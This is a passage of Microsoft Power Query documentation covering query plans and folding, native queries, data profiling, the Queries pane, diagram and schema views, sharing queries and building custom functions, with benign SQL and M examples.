The goal now is to review this step and understand what's being folded back to the data
source and what can't be folded.

2. Select the query step to review its query plan


You've identified the Kept bottom rows step as a step of interest since it doesn't fold
back to the data source. Right-click the step and select the View Query plan option. This
action displays a new dialog that contains a diagram for the query plan of the selected
step.

Power Query tries to optimize your query by taking advantage of lazy evaluation and
query folding, as mentioned in Query folding basics. This query plan represents the
optimized translation of your M query into the native query that's sent to the data
source. It also includes any transforms that are performed by the Power Query Engine.
The order in which the nodes appear follows the order of your query starting from the
last step or output of your query, which is represented on the far left of the diagram and
in this case is the Table.LastN node that represents the Kept bottom rows step.

At the bottom of the dialog, there's a bar with icons that help you zoom in or out of the
query plan view, and other buttons to help you manage the view. For the previous
image, the Fit to view option from this bar was used to better appreciate the nodes.

7 Note

The query plan represents the optimized plan. When the engine is evaluating a
query, it tries to fold all operators into a data source. In some cases, it might even
do some internal reordering of the steps to maximize folding. With this in mind, the
nodes/operators left in this optimized query plan typically contain the "folded" data
source query and any operators that couldn't be folded and are evaluated locally.

Identify folded nodes from other nodes


You can identify the nodes in this diagram as two groups:

Folded nodes: This node can be either Value.NativeQuery or "data source" nodes
such as Sql.Database . These can also be identified with the label remote under
their function name.
Non-folded nodes: Other table operators, such as Table.SelectRows ,
Table.SelectColumns , and other functions that couldn't be folded. These can also

be identified with the labels Full scan and Streaming.

The following image shows the folded nodes inside the red rectangle. The rest of the
nodes couldn't be folded back to the data source. You'll need to review the rest of the
nodes since the goal is to attempt to have those nodes fold back to the data source.

You can select View details at the bottom of some nodes to display extended
information. For example, the details of the Value.NativeQuery node show the native
query (in SQL) that will be sent to the data source.


The query shown here might not be exactly the same query sent to the data source, but
it's a good approximation. For this case, it tells you exactly what columns will be queried
from the SalesOrderHeader table and then how it will filter that table using the TotalDue
field to only get rows where the value for that field is larger than 1000. The node next to
it, Table.LastN, is calculated locally by the Power Query engine, as it can't be folded.

7 Note

The operators might not exactly match the functions used in the query's script.

Review non-folded nodes and consider actions to make


your transform fold
You've now determined which nodes couldn't be folded and will be evaluated locally.
This case only has the Table.LastN node, but in other scenarios it could have many
more.

The goal is to apply changes to your query so that the step can be folded. Some of the
changes you might implement could range from rearranging your steps to applying an
alternative logic to your query that's more explicit to the data source. This doesn't mean
that all queries and all operations are foldable by applying some changes. But it's a
good practice to determine through trial and error if your query could be folded back.

Since the data source is a SQL Server database, if the goal is to retrieve the last five
orders from the table, then a good alternative would be to take advantage of the TOP
and ORDER BY clauses in SQL. Since there's no BOTTOM clause in SQL, the Table.LastN
transform in PowerQuery can't be translated into SQL. You could remove the
Table.LastN step and replace it with:

A sort descending step by the SalesOrderID column in the table, since this column
determines which order goes first and which has been entered last.
Select the top five rows since the table has been sorted, this transform
accomplishes the same as if it was a Kept bottom rows ( Table.LastN ).

This alternative is equivalent to the original query. While this alternative in theory seems
good, you need to make the changes to see if this alternative will make this node fully
fold back to the data source.

3. Implement changes to your query


Implement the alternative discussed in the previous section:

1. Close the query plan dialog and go back to the Power Query Editor.

2. Remove the Kept bottom rows step.

3. Sort the SalesOrderID column in descending order.

4. Select the table icon on the top-left corner of the data preview view and select the
option that reads Keep top rows. In the dialog, pass the number five as the
argument and hit OK.

After implementing the changes, check the query folding indicators again and see if it's
giving you a folded indicator.


Now it's time to review the query plan of the last step, which is now Keep top rows.
Now there are only folded nodes. Select View details under Value.NativeQuery to verify
which query is being sent to the database.

While this article is suggesting what alternative to apply, the main goal is for you to
learn how to use the query plan to investigate query folding. This article also provides
visibility of what's being sent to your data source and what transforms will be done
locally.

You can adjust your code to see the impact that it has in your query. By using the query
folding indicators, you'll also have a better idea of which steps are preventing your
query from folding.
Query folding on native queries
Article • 02/17/2023

In Power Query, you're able to define a native query and run it against your data source.
The Import data from a database using native database query article explains how to do
this process with multiple data sources. But, by using the process described in that
article, your query won't take advantage of any query folding from subsequent query
steps.

This article showcases an alternative method to create native queries against your data
source using the Value.NativeQuery function and keep the query folding mechanism
active for subsequent steps of your query.

7 Note

We recommend that you read the documentation on query folding and the query
folding indicators to better understand the concepts used throughout this article.

Supported data connectors


The method described in the next sections applies to the following data connectors:

Amazon Redshift
Dataverse (when using enhanced compute)
Google BigQuery
PostgreSQL
SAP HANA
Snowflake
SQL Server

Connect to target from data source

7 Note

To showcase this process, this article uses the SQL Server connector and the
AdventureWorks2019 sample database. The experience may vary from connector
to connector, but this article showcases the fundamentals on how to enable query
folding capabilities over native queries for the supported connectors.
When connecting to the data source, it's important that you connect to the node or
level where you want to execute your native query. For the example in this article, that
node will be the database level inside the server.

After defining the connection settings and supplying the credentials for your
connection, you'll be taken to the navigation dialog for your data source. In that dialog,
you'll see all the available objects that you can connect to.

From this list, you need to select the object where the native query is run (also known as
the target). For this example, that object is the database level.

At the navigator window in Power Query, right-click the database node in the navigator
window and select the Transform Data option. Selecting this option creates a new query
of the overall view of your database, which is the target you need to run your native
query.
Once your query lands in the Power Query editor, only the Source step should show in
the Applied steps pane. This step contains a table with all the available objects in your
database, similar to how they were displayed in the Navigator window.

Use Value.NativeQuery function


The goal of this process is to execute the following SQL code, and to apply more
transformations with Power Query that can be folded back to the source.

SQL

SELECT DepartmentID, Name FROM HumanResources.Department WHERE GroupName =


'Research and Development'

The first step was to define the correct target, which in this case is the database where
the SQL code will be run. Once a step has the correct target, you can select that step—in
this case, Source in Applied Steps—and then select the fx button in the formula bar to
add a custom step. In this example, replace the Source formula with the following
formula:

Power Query M

Value.NativeQuery(Source, "SELECT DepartmentID, Name FROM


HumanResources.Department WHERE GroupName = 'Research and Development' ",
null, [EnableFolding = true])

The most important component of this formula is the use of the optional record for the
forth parameter of the function that has the EnableFolding record field set to true.

7 Note

You can read more about the Value.NativeQuery function from the official
documentation article.

After you have entered the formula, a warning will be shown that will require you to
enable native queries to run for your specific step. You can click continue for this step to
be evaluated.

This SQL statement yields a table with only three rows and two columns.
Test query folding
To test the query folding of your query, you can try to apply a filter to any of your
columns and see if the query folding indicator in the applied steps section shows the
step as folded. For this case, you can filter the DepartmentID column to have values that
are not equal to two.

After adding this filter, you can check that the query folding indicators still show the
query folding happening at this new step.
To further validate what query is being sent to the data source, you can right-click the
Filtered rows step and select the option that reads View query plan to check the query
plan for that step.

In the query plan view, you can see that a node with the name Value.NativeQuery at the
left side of the screen that has a hyperlink text that reads View details. You can click this
hyperlink text to view the exact query that is being sent to the SQL Server database.

The native query is wrapped around another SELECT statement to create a subquery of
the original. Power Query will do its best to create the most optimal query given the
transforms used and the native query provided.
 Tip

For scenarios where you get errors because query folding wasn't possible, it is
recommended that you try validating your steps as a subquery of your original
native query to check if there might be any syntax or context conflicts.
Using the data profiling tools
Article • 08/14/2023

The data profiling tools provide new and intuitive ways to clean, transform, and
understand data in Power Query Editor. They include:

Column quality

Column distribution

Column profile

To enable the data profiling tools, go to the View tab on the ribbon. In Power Query
Desktop, enable the options you want in the Data preview group, as shown in the
following image.

In Power Query Online, select Data view, then enable the options you want in the drop-
down list.
After you enable the options, you'll see something like the following image in Power
Query Editor.
7 Note

By default, Power Query performs this data profiling over the first 1,000 rows of
your data. To have it operate over the entire dataset, select the Column profiling
based on top 1000 rows message in the lower-left corner of your editor window to
change column profiling to Column profiling based on entire dataset.

Column quality
The column quality feature labels values in rows in five categories:

Valid, shown in green.

Error, shown in red.

Empty, shown in dark grey.

Unknown, shown in dashed green. Indicates when there are errors in a column, the
quality of the remaining data is unknown.

Unexpected error, shown in dashed red.

These indicators are displayed directly underneath the name of the column as part of a
small bar chart, as shown in the following image.
The number of records in each column quality category is also displayed as a
percentage.

By hovering over any of the columns, you are presented with the numerical distribution
of the quality of values throughout the column. Additionally, selecting the ellipsis button
(...) opens some quick action buttons for operations on the values.

Column distribution
This feature provides a set of visuals underneath the names of the columns that
showcase the frequency and distribution of the values in each of the columns. The data
in these visualizations is sorted in descending order from the value with the highest
frequency.

By hovering over the distribution data in any of the columns, you get information about
the overall data in the column (with distinct count and unique values). You can also
select the ellipsis button and choose from a menu of available operations.
Column profile
This feature provides a more in-depth look at the data in a column. Apart from the
column distribution chart, it contains a column statistics chart. This information is
displayed underneath the data preview section, as shown in the following image.
Filter by value
You can interact with the value distribution chart on the right side and select any of the
bars by hovering over the parts of the chart.

Right-click to display a set of available transformations for that value.

Copy data
In the upper-right corner of both the column statistics and value distribution sections,
you can select the ellipsis button (...) to display a Copy shortcut menu. Select it to copy
the data displayed in either section to the clipboard.

Group by value
When you select the ellipsis button (...) in the upper-right corner of the value
distribution chart, in addition to Copy you can select Group by. This feature groups the
values in your chart by a set of available options.

The image below shows a column of product names that have been grouped by text
length. After the values have been grouped in the chart, you can interact with individual
values in the chart as described in Filter by value.
Using the Queries pane
Article • 02/17/2023

In Power Query, you'll be creating many different queries. Whether it be from getting
data from many tables or from duplicating the original query, the number of queries will
increase.

You'll be using the Queries pane to navigate through the queries.

Navigating with the Queries pane


The most basic usage of the Queries pane is to navigate to all of the queries. The
navigation is similar to a file explorer. To switch between the queries, just select the
query you want to go to.

7 Note

Some actions in the Power Query Online editor may be different than actions in the
Power Query Desktop editor. These differences will be noted in this article.

Basic actions in the Query pane


Similar to features throughout the ribbon and the editor, the context menu of a query
lets you make transformations directly onto the query.
To reach these actions, open the context menu (the right-click menu) in the Query pane.

Differences between online and desktop:

Power Query Online

Power Query Desktop


To be more comprehensive, we'll be touching on all of the context menu actions that are
relevant for either.

Rename a query
To directly change the name of the query, double-select on the name of the query. This
action will allow you to immediately change the name.

Other options to rename the query are:

Go to the context menu and select Rename.

Go to Query Settings and enter in a different name in the Name input field.

Delete a query
To delete a query, open the context pane on the query and select Delete. There will be
an additional pop-up confirming the deletion. To complete the deletion, select the
Delete button.

Duplicating a query
Duplicating a query will create a copy of the query you're selecting.

To duplicate your query, open the context pane on the query and select Duplicate. A
new duplicate query will pop up on the side of the query pane.
Referencing a query
Referencing a query will create a new query. The new query uses the steps of a previous
query without having to duplicate the query. Additionally, any changes on the original
query will transfer down to the referenced query.

To reference your query, open the context pane on the query and select Reference. A
new referenced query will pop up on the side of the query pane.

Copy and paste


Copy and paste can be used when you have a copied query to place in the Power Query
editor.

7 Note

To learn more about how to copy and paste queries in Power Query, go to Sharing
a query.

Context pane options in the Queries pane


There are some additional context pane options in the Queries pane that you can use.
These options are New query, Merge queries, New parameter, and New group.
To reach these options, open the context menu (the right-click menu) in the Queries
pane.

Differences between online and desktop:

Power Query Online

Power Query Desktop

For the sake of being more comprehensive, we'll once again describe all of the context
menu actions that are relevant for either.

New query
You can import data into the Power Query editor as an option from the context menu.

This option functions the same as the Get Data feature.


7 Note

To learn about how to get data into Power Query, go to Getting data

Merge queries
When you select the Merge queries option from the context menu, the Merge queries
input screen opens.

This option functions the same as the Merge queries feature located on the ribbon and
in other areas of the editor.

7 Note

To learn more about how to use the Merge queries feature, go to Merge queries
overview.

New parameter
When you select the New parameter option from the context menu, the New
parameter input screen opens.

This option functions the same as the New parameter feature located on the ribbon.

7 Note

To learn more about Parameters in Power Query, go to Using parameters.


New group
You can make folders and move the queries into and out of the folders for
organizational purposes. These folders are called groups.

To move the query into a group, open the context menu on the specific query.

In the menu, select Move to group.

Then, select the group you want to put the query in.

The move will look like the following image. Using the same steps as above, you can
also move the query out of the group by selecting Queries (root) or another group.
In desktop versions of Power Query, you can also drag and drop the queries into the
folders.
Diagram view
Article • 02/17/2023

Diagram view offers a visual way to prepare data in the Power Query editor. With this
interface, you can easily create queries and visualize the data preparation process.
Diagram view simplifies the experience of getting started with data wrangling. It speeds
up the data preparation process and helps you quickly understand the dataflow, both
the "big picture view" of how queries are related and the "detailed view" of the specific
data preparation steps in a query.

This article provides an overview of the capabilities provided by diagram view.

This feature is enabled by selecting Diagram view in the View tab on the ribbon. With
diagram view enabled, the steps pane and queries pane will be collapsed.

7 Note

Currently, diagram view is only available in Power Query Online.


Authoring queries using diagram view
Diagram view provides you with a visual interface to create, view, or modify your
queries. In diagram view, you can connect to many different types of data sources using
the get data experience.

Diagram view is also connected to the Data Preview and the ribbon so that you can
select columns in the Data Preview.

You can add a new step within a query, after the currently selected step, by selecting the
+ button, and then either search for the transform or choose the item from the shortcut
menu. These are the same transforms you'll find in the Power Query editor ribbon.

By searching and selecting the transform from the shortcut menu, the step gets added
to the query, as shown in the following image.

7 Note

To learn more about how to author queries in the Query editor using the Power
Query editor ribbon or data preview, go to Power Query Quickstart.
Query level actions
You can perform two quick actions on a query—expand/collapse a query and highlight
related queries. These quick actions show up on an active selected query or when
hovering over a query.

You can perform more query level actions such as duplicate, reference, and so on, by
selecting the query level context menu (the three vertical dots). You can also right-click
in the query and get to the same context menu.

Expand or collapse query


To expand or collapse a query, right-click in the query and select Expand/Collapse from
the query's context menu. You can also double-click in the query to expand or collapse a
query.
Highlight related queries
To view all the related queries for a given query, right-click in a query and select
Highlight related queries. You can also select the highlight related queries button on
the top-right of a query.
For example, if you select the highlight related queries button in the Top US Customers
query, you can see that the Customers and Orders queries are highlighted.

Delete query
To delete a query, right-click in a query and select Delete from the context menu. There
will be an additional pop-up to confirm the deletion.
Rename query
To rename a query, right-click in a query and select Rename from the context menu.
Enable load
To ensure that the results provided by the query are available for downstream use such
as report building, by default Enable load is set to true. In case you need to disable load
for a given query, right-click in a query and select Enable load. The queries where
Enable load is set to false will be displayed with a grey outline.
Duplicate
To create a copy of a given query, right-click in the query and select Duplicate. A new
duplicate query will appear in the diagram view.
Reference
Referencing a query will create a new query. The new query will use the steps of the
previous query without having to duplicate the query. Additionally, any changes on the
original query will transfer down to the referenced query. To reference a query, right-
click in the query and select Reference.
Move to group
You can make folders and move the queries into these folders for organizational
purposes. These folders are called groups. To move a given query to a Query group,
right-click in a query and select Move to group. You can choose to move the queries to
an existing group or create a new query group.
You can view the query groups above the query box in the diagram view.

Create function
When you need to apply the same set of transformations in different queries or values,
creating custom Power Query functions can be valuable. To learn more about custom
functions, go to Using custom functions. To convert a query into a reusable function,
right-click in a given query and select Create function.
Convert to parameter
A parameter provides the flexibility to dynamically change the output of your queries
depending on their value and promotes reusability. To convert a non-structured value
such as date, text, number, and so on, right-click in the query and select Convert to
Parameter.
7 Note

To learn more about parameters, go to Power Query parameters.

Advanced editor
With the advanced editor, you can see the code that Power Query editor is creating with
each step. To view the code for a given query, right-click in the query and select
Advanced editor.
7 Note

To learn more about the code used in the advanced editor, go to Power Query M
language specification.

Edit query name and description


To edit the name of a query or add a description, right-click in a query and select
Properties.
This action will open a dialog box where you can edit the name of the query or add to
or modify the query description.
Queries with query description will have an affordance (i icon). You can view the query
description by hovering near the query name.

Append queries/Append queries as new


To append or perform a UNION of queries, right-click in a query and select Append
queries. This action will display the Append dialog box where you can add more tables
to the current query. Append queries as new will also display the Append dialog box,
but will allow you to append multiple tables into a new query.

7 Note

To learn more about how to append queries in Power Query, go to Append


queries.

Merge queries/Merge queries as new


To merge or JOIN queries, right-click in a query and select Merge queries. This action
will display the Merge dialog box, with the selected query as the left table of the merge
operation. Merge queries as new will also display the Merge dialog box but will allow
you to merge two tables into a new query.

7 Note

To learn more about how to merge queries in Power Query, go to Merge queries
overview.

Step level actions


By right-clicking a step, you can perform step level actions such as Edit settings, Rename,
and so on.
You can also perform step level actions by hovering over the step and selecting the
ellipsis (three vertical dots).

Edit settings
To edit the step level settings, right-click the step and choose Edit settings. Instead, you
can double-click the step (that has step settings) and directly get to the settings dialog
box. In the settings dialog box, you can view or change the step level settings. For
example, the following image shows the settings dialog box for the Split column step.
Rename step
To rename a step, right-click the step and select Rename. This action opens the Step
properties dialog. Enter the name you want, and then select OK.

Delete step
To delete a step, right-click the step and select Delete. To delete a series of steps until
the end, right-click the step and select Delete until end.

Move before/Move after


To move a step one position before, right-click a step and select Move before. To move
a step one position after, right-click a step and select Move after.
Extract previous
To extract all previous steps into a new query, right-click the first step that you do not
want to include in the query and then select Extract previous.

Edit step name and description


To add step descriptions, right-click a step in a query and then choose Properties.
You can also get to the step level context menu by hovering over the step and selecting
the ellipsis (three vertical dots).

This action will open a dialog box where you can add the step description. This step
description will come handy when you come back to the same query after a few days or
when you share your queries or dataflows with other users.
By hovering over each step, you can view a call out that shows the step label, step name,
and step descriptions (that were added).

By selecting each step, you can see the corresponding data preview for that step.

Expand and collapse queries


To ensure that you can view your queries in the diagram view, you can collapse the ones
that you aren't actively working on and expand the ones that you care about. Expand or
collapse queries by selecting the Expand/Collapse button on the top-right of a query.
Alternatively, double-clicking an expanded query will collapse the query and vice-versa.

You can also expand or collapse a query by selecting the query level actions from the
query's context menu.
To expand all or collapse all queries, select the Expand all/Collapse all button next to
the layout options in the diagram view pane.

You can also right-click any empty space in the diagram view pane and see a context
menu to expand all or collapse all queries.

In the collapsed mode, you can quickly look at the steps in the query by hovering over
the number of steps in the query. You can select these steps to navigate to that specific
step within the query.
Layout Options
There are five layout options available in the diagram view: zoom out, zoom in, mini-
map, full screen, fit to view, and reset.

Zoom out/zoom in
With this option, you can adjust the zoom level and zoom out or zoom in to view all the
queries in the diagram view.

Mini-map
With this option, you can turn the diagram view mini-map on or off. More information:
Show mini-map

Full screen
With this option, you can view all the queries and their relationships through the Full
screen mode. The diagram view pane expands to full screen and the data preview pane,
queries pane, and steps pane remain collapsed.

Fit to view
With this option, you can adjust the zoom level so that all the queries and their
relationships can be fully viewed in the diagram view.

Reset
With this option, you can reset the zoom level back to 100% and also reset the pane to
the top-left corner.

View query relationships


To view all the related queries for a given query, select the Highlight related queries
button. For instance, by selecting the highlight related queries button in the Top US
Customers query, the Customers and Orders queries are highlighted, as shown in the
following image.
You can also select the dongle on the left of a given query to see the direct and indirect
referenced queries.

Similarly, you can select the right dongle to view direct and indirect dependent queries.

You can also hover on the link icon below a step to view a callout that shows the query
relationships.

Diagram view settings


There are two ways to modify diagram view settings. The first way is to select the lower
half of the Diagram View button inside the View tab in the ribbon.

The second way to modify diagram view settings is to right-click over a blank part of the
diagram view background.

Step labels and step names


We show step labels by default within the diagram view.

You can change diagram view settings to show step names to match the applied steps
within the query settings pane.

Auto-highlight related queries


By selecting Auto-highlight related queries within diagram view settings, related
queries are always highlighted so that you can visually see the query dependencies
better

Compact view
When you have queries with multiple steps, it can be challenging to scroll horizontally to
view all your steps within the viewport.

To address this, diagram view offers Compact view, which compresses the steps from
top to bottom instead of left to right. This view can be especially useful when you have
queries with multiple steps, so that you can see as many queries as possible within the
viewport.

To enable this view, navigate to diagram view settings and select Compact view inside
the View tab in the ribbon.

Show mini-map
Once the number of queries begin to overflow the diagram view, you can use the scroll
bars at the bottom and right side of the diagram view to scroll through the queries. One
other method of scrolling is to use the diagram view mini-map control. The mini-map
control lets you keep track of the overall dataflow "map", and quickly navigate, while
looking at an specific area of the map in the main diagram view area.

To open the mini-map, either select Show mini-map from the diagram view menu or
select the mini-map button in the layout options.
Right-click and hold the rectangle on the mini-map, then move the rectangle to move
around in the diagram view.

Show animations
When the Show animations menu item is selected, the transitions of the sizes and
positions of the queries is animated. These transitions are easiest to see when collapsing
or expanding the queries or when changing the dependencies of existing queries. When
cleared, the transitions will be immediate. Animations are turned on by default.

Maximize data preview


You may want to see more data within the data preview to understand and analyze the
data. To do so, expand the data preview so that you can see as much data as before
within the data preview without leaving diagram View.

Expand or collapse all queries


By default, the queries within diagram view are collapsed. There are options to expand
or collapse each query in a single click.

You can also expand or collapse related queries from the query level context menu.

Multi-select queries
You select multiple queries within the diagram view by holding down the Ctrl key and
clicking queries. Once you multi-select, right-clicking will show a context menu that
allows performing operations such as merge, append, move to group, expand/collapse
and more.

Inline rename
You can double-click the query name to rename the query.

Double-clicking the step name allows you to rename the step, provided the diagram
view setting is showing step names.

When step labels are displayed in diagram view, double-clicking the step label shows
the dialog box to rename the step name and provide a description.
Accessibility
Diagram view supports accessibility features such as keyboard navigation, high-contrast
mode, and screen reader support. The following table describes the keyboard shortcuts
that are available within diagram view. To learn more about keyboard shortcuts available
within Power Query Online, go to keyboard shortcuts in Power Query.

Action Keyboard shortcut

Expand selected query Ctrl+Right arrow key

Collapse selected query Ctrl+Left arrow key

Move focus from query level to step level Alt+Down arrow key

Move focus from step level to query level Esc

Expand all queries Ctrl+Shift+Right arrow key

Collapse all queries Ctrl+Shift+Left arrow key

Insert new step using+button (after selected step) Ctrl+Alt+N

Highlight related queries Ctrl+Alt+R


Action Keyboard shortcut

Select all queries Ctrl+A

Copy queries Ctrl+C

Paste queries Ctrl+V


Using Schema view (Preview)
Article • 02/17/2023

Schema view is designed to optimize your flow when working on schema level
operations by putting your query's column information front and center. Schema view
provides contextual interactions to shape your data structure, and lower latency
operations as it only requires the column metadata to be computed and not the
complete data results.

This article walks you through schema view and the capabilities it offers.

7 Note

The Schema view feature is available only for Power Query Online.

Overview
When working on data sets with many columns, simple tasks can become incredibly
cumbersome because even finding the right column by horizontally scrolling and
parsing through all the data is inefficient. Schema view displays your column
information in a list that's easy to parse and interact with, making it easier than ever to
work on your schema.
In addition to an optimized column management experience, another key benefit of
schema view is that transforms tend to yield results faster. These results are faster
because this view only requires the columns information to be computed instead of a
preview of the data. So even working with long running queries with a few columns will
benefit from using schema view.

You can turn on schema view by selecting Schema view in the View tab. When you're
ready to work on your data again, you can select Data view to go back.

Reordering columns
One common task when working on your schema is reordering columns. In Schema
View this can easily be done by dragging columns in the list and dropping in the right
location until you achieve the desired column order.

Applying transforms
For more advanced changes to your schema, you can find the most used column-level
transforms right at your fingertips directly in the list and in the Schema tools tab. Plus,
you can also use transforms available in other tabs on the ribbon.
Share a query
Article • 12/17/2022

You can use Power Query to extract and transform data from external data sources.
These extraction and transformations steps are represented as queries. Queries created
with Power Query are expressed using the M language and executed through the M
Engine.

You can easily share and reuse your queries across projects, and also across Power
Query product integrations. This article covers the general mechanisms to share a query
in Power Query.

Copy / Paste
In the queries pane, right-click the query you want to copy. From the dropdown menu,
select the Copy option. The query and its definition will be added to your clipboard.

7 Note

The copy feature is currently not available in Power Query Online instances.
To paste the query from your clipboard, go to the queries pane and right-click on any
empty space in it. From the menu, select Paste.

When pasting this query on an instance that already has the same query name, the
pasted query will have a suffix added with the format (#) , where the pound sign is
replaced with a number to distinguish the pasted queries.

You can also paste queries between multiple instances and product integrations. For
example, you can copy the query from Power BI Desktop, as shown in the previous
images, and paste it in Power Query for Excel as shown in the following image.
2 Warning

Copying and pasting queries between product integrations doesn't guarantee that
all functions and functionality found in the pasted query will work on the
destination. Some functionality might only be available in the origin product
integration.

Copy the M code


You can also copy the full code of your query.
1. Select the query that you want to share.
2. In the ribbon, select the View tab and then select Advanced Editor.
3. In the Advanced Editor window, select all the code and copy it.

With the code of your query in your clipboard, you can share this query through the
means of your choice. The recipient of this code needs to create a blank query and
follow the same steps as described above. But instead of copying the code, the recipient
will replace the code found in their blank query with the code that you provided.

7 Note

To create a blank query, go to the Get Data window and select Blank query from
the options.

Product-specific query sharing capabilities


Some Power Query product integrations might offer more ways to share queries such as
but not limited to:

In Microsoft Excel—Creating an Office Data Connection (.odc) to share with other


users.
In Power BI Desktop—Creating a Power BI Template (.pbit) to share with other
users.
We recommend that you read the documentation of the product integration that you're
interested in to learn more about the query sharing capabilities found in those products.
Using custom functions
Article • 02/17/2023

If you find yourself in a situation where you need to apply the same set of
transformations to different queries or values, creating a Power Query custom function
that can be reused as many times as you need could be beneficial. A Power Query
custom function is a mapping from a set of input values to a single output value, and is
created from native M functions and operators.

While you can manually create your own Power Query custom function using code as
shown in Understanding Power Query M functions, the Power Query user interface
offers you features to speed up, simplify, and enhance the process of creating and
managing a custom function.

This article focuses on this experience, provided only through the Power Query user
interface, and how to get the most out of it.

) Important

This article outlines how to create a custom function with Power Query using
common transforms accessible in the Power Query user interface. It focuses on the
core concepts to create custom functions, and links to additional articles in Power
Query documentation for more information on specific transforms that are
referenced in this article.

Create a custom function from a table


reference

7 Note

The following example was created using the desktop experience found in Power BI
Desktop and can also be followed using the Power Query experience found in Excel
for Windows.

You can follow along with this example by downloading the sample files used in this
article from the following download link . For simplicity, this article will be using the
Folder connector. To learn more about the Folder connector, go to Folder. The goal of
this example is to create a custom function that can be applied to all the files in that
folder before combining all of the data from all files into a single table.

Start by using the Folder connector experience to navigate to the folder where your files
are located and select Transform Data or Edit. This will take you to the Power Query
experience. Right-click on the Binary value of your choice from the Content field and
select the Add as New Query option. For this example, you'll see that the selection was
made for the first file from the list, which happens to be the file April 2019.csv.

This option will effectively create a new query with a navigation step directly to that file
as a Binary, and the name of this new query will be the file path of the selected file.
Rename this query to be Sample File.

Create a new parameter with the name File Parameter. Use the Sample File query as the
Current Value, as shown in the following image.
7 Note

We recommend that you read the article on Parameters to better understand how
to create and manage parameters in Power Query.

Custom functions can be created using any parameters type. There's no


requirement for any custom function to have a binary as a parameter.

The binary parameter type is only displayed inside the Parameters dialog Type
dropdown menu when you have a query that evaluates to a binary.

It's possible to create a custom function without a parameter. This is commonly


seen in scenarios where an input can be inferred from the environment where the
function is being invoked. For example, a function that takes the environment's
current date and time, and creates a specific text string from those values.
Right-click File Parameter from the Queries pane. Select the Reference option.

Rename the newly created query from File Parameter (2) to Transform Sample file.

Right-click this new Transform Sample file query and select the Create Function option.
This operation will effectively create a new function that will be linked with the
Transform Sample file query. Any changes that you make to the Transform Sample file
query will be automatically replicated to your custom function. During the creation of
this new function, use Transform file as the Function name.

After creating the function, you'll notice that a new group will be created for you with
the name of your function. This new group will contain:

All parameters that were referenced in your Transform Sample file query.
Your Transform Sample file query, commonly known as the sample query.
Your newly created function, in this case Transform file.

Applying transformations to a sample query


With your new function created, select the query with the name Transform Sample file.
This query is now linked with the Transform file function, so any changes made to this
query will be reflected in the function. This is what is known as the concept of a sample
query linked to a function.

The first transformation that needs to happen to this query is one that will interpret the
binary. You can right-click the binary from the preview pane and select the CSV option
to interpret the binary as a CSV file.
The format of all the CSV files in the folder is the same. They all have a header that
spans the first top four rows. The column headers are located in row five and the data
starts from row six downwards, as shown in the next image.

The next set of transformation steps that need to be applied to the Transform Sample
file are:

1. Remove the top four rows—This action will get rid of the rows that are considered
part of the header section of the file.
7 Note

To learn more about how to remove rows or filter a table by row position, go
to Filter by row position.

2. Promote headers—The headers for your final table are now in the first row of the
table. You can promote them as shown in the next image.
Power Query by default will automatically add a new Changed Type step after
promoting your column headers that will automatically detect the data types for each
column. Your Transform Sample file query will look like the next image.

7 Note

To learn more about how to promote and demote headers, go to Promote or


demote column headers.
U Caution

Your Transform file function relies on the steps performed in the Transform
Sample file query. However, if you try to manually modify the code for the
Transform file function, you'll be greeted with a warning that reads The definition
of the function 'Transform file' is updated whenever query 'Transform Sample

file' is updated. However, updates will stop if you directly modify function

'Transform file'.

Invoke a custom function as a new column


With the custom function now created and all the transformation steps incorporated,
you can go back to the original query where you have the list of files from the folder.
Inside the Add Column tab in the ribbon, select Invoke Custom Function from the
General group. Inside the Invoke Custom Function window, enter Output Table as the
New column name. Select the name of your function, Transform file, from the Function
query dropdown. After selecting the function from the dropdown menu, the parameter
for the function will be displayed and you can select which column from the table to use
as the argument for this function. Select the Content column as the value / argument to
be passed for the File Parameter.
After you select OK, a new column with the name Output Table will be created. This
column has Table values in its cells, as shown in the next image. For simplicity, remove
all columns from this table except Name and Output Table.

7 Note
To learn more about how to choose or remove columns from a table, go to Choose
or remove columns.

Your function was applied to every single row from the table using the values from the
Content column as the argument for your function. Now that the data has been
transformed into the shape that you're looking for, you can expand the Output Table
column, as shown in the image below, without using any prefix for the expanded
columns.

You can verify that you have data from all files in the folder by checking the values in the
Name or Date column. For this case, you can check the values from the Date column, as
each file only contains data for a single month from a given year. If you see more than
one, it means that you've successfully combined data from multiple files into a single
table.

7 Note
What you've read so far is fundamentally the same process that happens during the
Combine files experience, but done manually.

We recommend that you also read the article on Combine files overview and
Combine CSV files to further understand how the combine files experience works
in Power Query and the role that custom functions play.

Add new parameter to existing custom function


Imagine that there's a new requirement on top of what you've built. The new
requirement requires that before you combine the files, you filter the data inside them
to only get the rows where the Country is equals to Panama.

To make this requirement happen, create a new parameter called Market with the text
data type. For the Current Value, enter the value Panama.
With this new parameter, select the Transform Sample file query and filter the Country
field using the value from the Market parameter.
7 Note

To learn more about how to filter columns by values, go to Filter values.

Applying this new step to your query will automatically update the Transform file
function, which will now require two parameters based on the two parameters that your
Transform Sample file uses.

But the CSV files query has a warning sign next to it. Now that your function has been
updated, it requires two parameters. So the step where you invoke the function results
in error values, since only one of the arguments was passed to the Transform file
function during the Invoked Custom Function step.

To fix the errors, double-click Invoked Custom Function in the Applied Steps to open
the Invoke Custom Function window. In the Market parameter, manually enter the
value Panama.
You can now check your query to validate that only rows where Country is equal to
Panama show up in the final result set of the CSV Files query.

Create a custom function from a reusable piece


of logic
If you have multiple queries or values that require the same set of transformations, you
could create a custom function that acts as a reusable piece of logic. Later, this custom
function can be invoked against the queries or values of your choice. This custom
function could save you time and help you in managing your set of transformations in a
central location, which you can modify at any moment.

For example, imagine a query that has several codes as a text string and you want to
create a function that will decode those values, as in the following sample table:

code

PTY-CM1090-LAX
code

LAX-CM701-PTY

PTY-CM4441-MIA

MIA-UA1257-LAX

LAX-XY2842-MIA

You start by having a parameter that has a value that serves as an example. For this case,
it will be the value PTY-CM1090-LAX.
From that parameter, you create a new query where you apply the transformations that
you need. For this case, you want to split the code PTY-CM1090-LAX into multiple
components:

Origin = PTY
Destination = LAX
Airline = CM
FlightID = 1090
The M code for that set of transformations is shown below.

Power Query M

let
Source = code,
SplitValues = Text.Split( Source, "-"),
CreateRow = [Origin= SplitValues{0}, Destination= SplitValues{2},
Airline=Text.Start( SplitValues{1},2), FlightID= Text.End( SplitValues{1},
Text.Length( SplitValues{1} ) - 2) ],
RowToTable = Table.FromRecords( { CreateRow } ),
#"Changed Type" = Table.TransformColumnTypes(RowToTable,{{"Origin", type
text}, {"Destination", type text}, {"Airline", type text}, {"FlightID", type
text}})
in
#"Changed Type"

